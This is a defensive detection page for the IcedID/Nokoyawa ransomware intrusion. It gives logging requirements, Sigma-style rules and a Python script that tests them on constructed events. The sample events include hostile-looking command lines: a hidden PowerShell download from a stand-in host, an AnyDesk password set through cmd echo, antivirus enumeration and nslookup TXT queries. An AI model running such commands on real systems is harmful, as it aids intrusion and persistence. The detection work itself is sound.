IcedID/Nokoyawa Ransomware
Original research credit: TheDFIReport
TL;DR Summary
- In late February 2023, threat actors rode a wave of initial access using Microsoft OneNote files. In this case, we observed a threat actor deliver IcedID using this method.
- After loading IcedID and establishing persistence, there were no further actions other than beaconing for over 30 days.
- The threat actor used Cobalt Strike and AnyDesk to target a file server and a backup server.
- The threat actor used FileZilla to exfiltrate data from the network before deploying Nokoyawa ransomware.
Required Logging
Event ID | Channel | Details |
4688 / 1 | Security, Sysmon | New process creation. Event 4688 carries the command line only if "Include command line in process creation events" is enabled in audit policy; Sysmon Event ID 1 records it by default. |
17 | Sysmon | Pipe creation event. |
4698 | Security | New Task Creation. |
Detection Rules
Rule Name | Description | Detection Logic |
Powershell Invoking Webrequest | Detects usage of PowerShell’s “Invoke-WebRequest” cmdlet on the command line. | Product: Windows Category: process_creation Event ID: 4688 / 1 (sysmon) Command|ContainsAll: – “invoke” – “webrequest” |
Cobaltstrike Pipe Naming Pattern | Detects the default named-pipe naming patterns used by Cobalt Strike’s beacon and post-exploitation jobs. | Product: Windows Category: pipe_creation Event ID: 17 (sysmon) Pipename|ContainsAny: – \postex_ – \postex_ssh_ – \status_ – \msagent_ – \MSSE- – \-server |
IcedID Task Creation Pattern | Detects scheduled task creation arguments associated with IcedID persistence. | Product: Windows Category: task_creation Event ID: 4698 ExecArguments|ContainsAll: – “Cadiak.dll” – “license.dat” |
Execute DLL with spoofed extension | Detects rundll32 being handed a payload whose extension is not .dll (e.g. .html, .png, .pdf, .txt, .dat) or that sits in ProgramData or Users\Public, a common way to disguise a dropped DLL. | Product: Windows Category: process_creation Event ID: 4688 / 1 (sysmon) Command|ContainsAny: -‘rundll32.html,DllRegisterServer’ – ‘rundll32.htm,DllRegisterServer’ – ‘rundll32.txt,DllRegisterServer’ – ‘rundll32.png,DllRegisterServer’ – ‘rundll32.jpeg,DllRegisterServer’ – ‘rundll32.jpg,DllRegisterServer’ – ‘rundll32 c:\programdata\.pdf’ – ‘rundll32 c:\programdata\.txt’ – ‘rundll32 c:\programdata\.jpg’ – ‘rundll32 c:\programdata\.png’ – ‘rundll32 c:\programdata\.jpeg’ – ‘rundll32 c:\users\public\.pdf’ – ‘rundll32 c:\users\public\.txt’ – ‘rundll32 c:\users\public\.jpg’ – ‘rundll32 c:\users\public\.png’ – ‘rundll32 c:\users\public\.jpeg’ – ‘rundll32\.pdf’ – ‘rundll32\.txt’ – ‘rundll32\.jpg’ – ‘rundll32\.png’ – ‘rundll32\.jpeg’ – ‘rundll32\.dat’ |
AV Discovery | Detects the WMIC command line used to enumerate the AV products registered on the machine. | Product: Windows Category: process_creation Event ID: 4688 / 1 (sysmon) Command|ContainsAll: – “/node” – “SecurityCenter2” – “antivirusproduct” – “get” |
Potential DNS Exfiltration via nslookup | Triggers when nslookup is executed an excessive number of times from the same machine. This behaviour can indicate an actor gathering information about the network to exfiltrate at a later date. | Product: Windows Category: process_creation Event ID: 4688 / 1 (sysmon) Command|ContainsAny: – “nslookup” AND at least 5 matching events from the same Computer within 5 minutes (tune threshold and window to the environment) |
AnyDesk Piped Password Via CLI | Detects a password being piped into an AnyDesk instance via cmd.exe echo and the ‘--set-password’ flag. | Product: Windows Category: process_creation Event ID: 4688 / 1 (sysmon) Command|ContainsAll: – “/c” – “echo” – “.exe --set-password” |
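To see how the rules in the table behave on events, here is an added Python example; it is not part of TheDFIReport's research or of this page's original content. It implements the ContainsAll / ContainsAny substring logic and the per-host nslookup count threshold, then runs them over constructed sample events. The event schema (EventID, Computer, Command, Pipename, ExecArguments, ts), the timestamps and the command lines are made up for the illustration; the rundll32 rule is omitted from the transcription, it has the same ContainsAny shape as the pipe rule.

```python
"""Sigma-style substring matchers and a per-host count threshold for the
rules above, run over constructed sample events (not real telemetry)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Rules transcribed from the table: (name, field, mode, patterns).
# mode "all" = ContainsAll, "any" = ContainsAny.
RULES = [
    ("Powershell Invoking Webrequest", "Command", "all", ["invoke", "webrequest"]),
    ("Cobaltstrike Pipe Naming Pattern", "Pipename", "any",
     [r"\postex_", r"\postex_ssh_", r"\status_", r"\msagent_", r"\MSSE-", r"\-server"]),
    ("IcedID Task Creation Pattern", "ExecArguments", "all", ["Cadiak.dll", "license.dat"]),
    ("AV Discovery", "Command", "all", ["/node", "SecurityCenter2", "antivirusproduct", "get"]),
    ("AnyDesk Piped Password Via CLI", "Command", "all", ["/c", "echo", ".exe --set-password"]),
]
NSLOOKUP_THRESHOLD = 5                  # "at least 5 events ... same Computer"
NSLOOKUP_WINDOW = timedelta(minutes=5)  # "... in 5 minutes"

# Constructed sample events (this example's own normalised schema, not raw EVTX).
EVENTS = [
    {"ts": "2023-03-15T10:00:00", "EventID": 4688, "Computer": "WS01",
     "Command": r'powershell -nop -w hidden -c "Invoke-WebRequest http://example.invalid/a.png -OutFile C:\ProgramData\a.png"'},
    {"ts": "2023-03-15T10:00:09", "EventID": 17, "Computer": "WS01", "Pipename": r"\postex_5a2b"},
    {"ts": "2023-03-15T10:01:00", "EventID": 4698, "Computer": "WS01",
     "ExecArguments": r'"C:\Users\user\AppData\Roaming\Cadiak.dll",init /lic:"C:\Users\user\AppData\Roaming\license.dat"'},
    {"ts": "2023-03-15T10:02:00", "EventID": 4688, "Computer": "WS01",
     "Command": r"wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /format:list"},
    {"ts": "2023-03-15T10:03:00", "EventID": 4688, "Computer": "SRV01",
     "Command": r"cmd.exe /c echo Passw0rd! | C:\ProgramData\AnyDesk.exe --set-password"},
    # Benign event that still satisfies ContainsAll("invoke", "webrequest"): a false positive.
    {"ts": "2023-03-15T10:04:00", "EventID": 4688, "Computer": "WS02",
     "Command": r"notepad.exe C:\Users\user\Documents\invoke-webrequest-notes.txt"},
]
# Five nslookup runs on WS01 within one minute (should alert), two on SRV01 (should not).
EVENTS += [{"ts": f"2023-03-15T10:20:{s:02d}", "EventID": 4688, "Computer": "WS01",
            "Command": f"nslookup -type=TXT host{i}.example.invalid"}
           for i, s in enumerate((0, 30, 45, 50, 59))]
EVENTS += [{"ts": f"2023-03-15T10:2{m}:00", "EventID": 4688, "Computer": "SRV01",
            "Command": "nslookup dc01.example.invalid"} for m in (1, 2)]


def matches(rule, event):
    """Apply one substring rule to one event. Sigma 'contains' is case-insensitive,
    which is what lets 'antivirusproduct' hit the real 'AntiVirusProduct' token."""
    _name, field, mode, patterns = rule
    value = event.get(field)
    if value is None:                     # the rule's field is absent on this event type
        return False
    hay = value.lower()
    hits = [p.lower() in hay for p in patterns]
    return all(hits) if mode == "all" else any(hits)


def run_rules(events, rules=RULES):
    """Return (rule name, event) for every rule/event pair that matches."""
    return [(rule[0], ev) for ev in events for rule in rules if matches(rule, ev)]


def nslookup_bursts(events, threshold=NSLOOKUP_THRESHOLD, window=NSLOOKUP_WINDOW):
    """Hosts with >= threshold nslookup process creations inside any `window`
    (sliding window over sorted timestamps, grouped per Computer)."""
    per_host = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == 4688 and "nslookup" in ev.get("Command", "").lower():
            per_host[ev["Computer"]].append(datetime.fromisoformat(ev["ts"]))
    alerting = []
    for host, times in per_host.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop events older than the window
                start += 1
            if end - start + 1 >= threshold:
                alerting.append(host)
                break
    return alerting


if __name__ == "__main__":
    for name, ev in run_rules(EVENTS):
        detail = ev.get("Command") or ev.get("Pipename") or ev.get("ExecArguments")
        print(f"[{name}] {ev['Computer']}: {detail}")
    for host in nslookup_bursts(EVENTS):
        print(f"[Potential DNS Exfiltration via nslookup] {host}")
```

Two things the run makes visible: substring matching has to be case-insensitive or the AV Discovery rule misses the real `AntiVirusProduct` token, and ContainsAll on two common words ("invoke", "webrequest") fires on a notepad command line that merely names a file, so in production the PowerShell rule should also constrain the image name. The threshold rule is the only stateful one; it keys on Computer and needs the timestamps, which the pure substring rules do not.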